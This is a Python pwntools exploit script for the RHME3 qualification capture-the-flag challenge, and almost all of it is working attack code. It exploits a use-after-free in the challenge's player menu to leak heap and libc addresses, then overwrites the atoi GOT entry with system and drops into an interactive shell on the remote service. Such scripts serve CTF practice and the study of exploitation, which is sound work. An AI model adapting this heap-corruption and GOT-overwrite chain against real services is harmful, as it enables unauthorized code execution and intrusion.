RHME3 exploit for qualification challenge

rhme3_quals_exploit.py

from pwn import *

#r = remote('127.0.0.1', 1337)
atoi_system_offset = 58640
r = remote('pwn.rhme.riscure.com', 1337)

# Create player 0
r.recvuntil("Your choice:")
r.send("1\n")
r.send("A" * 0 + "\n")
r.send("1\n")
r.send("2\n")
r.send("3\n")
r.send("4\n")
r.recvuntil("Your choice:")

# Select and delete player 0
r.send("3\n")
r.send("0\n")
r.recvuntil("Your choice:")
r.send("2\n")
r.send("0\n")
r.recvuntil("Your choice:")

# Leak heap address
r.send("5\n")
r.recvuntil("Name:")
r.recvuntil(":")
heap_leak = int(r.recvuntil("\n").split(',')[0])
print "[+] Heap leak:", hex(heap_leak)

r.recvuntil("Your choice:")

# Edit name and linked list corruption
r.send("4\n")
r.recvuntil("Your choice:")
r.send("1\n")
r.recvuntil("name:")
r.send(p64(heap_leak) + "\n")
r.recvuntil("Your choice:")
r.send("0\n")
r.recvuntil("Your choice:")

# Fake chunk
r.send("1\n")
r.send("A" * 0 + "\n")
r.send("32\n")
r.send("0\n")
r.send("0\n")
r.send("0\n")
r.recvuntil("Your choice:")

# This gets allocated where we control it.
r.send("1\n")
r.send("A" * 253 + "\n")
r.send("0\n")
r.send("0\n")
r.send("0\n")
r.send("0\n")
r.recvuntil("Your choice:")

r.send("4\n")
r.recvuntil("Your choice:")
r.send("1\n")
r.recvuntil("name:")
r.send("B" * 16 + p64(0x603110) + "\n")  # atoi GOT
r.send("0\n")
r.recvuntil("Your choice:")

r.send("6\n")
r.recvuntil("Player 1")
r.recvuntil("Name:")
leak = u64(r.recvuntil("\n").strip().ljust(8, '\x00'))
print "[+] Libc leak:", hex(leak)
r.recvuntil("Your choice:")

# Select player 1 and do write-what-where
r.send("3\n")
r.send("1\n")
r.recvuntil("Your choice:")
r.send("4\n")
r.recvuntil("Your choice:")
r.send("1\n")
r.recvuntil("name:")
r.send(p64(leak + atoi_system_offset) + '\n')  # Overwrite GOT
r.send("sh\n")
print "[+] SHELL"
r.interactive()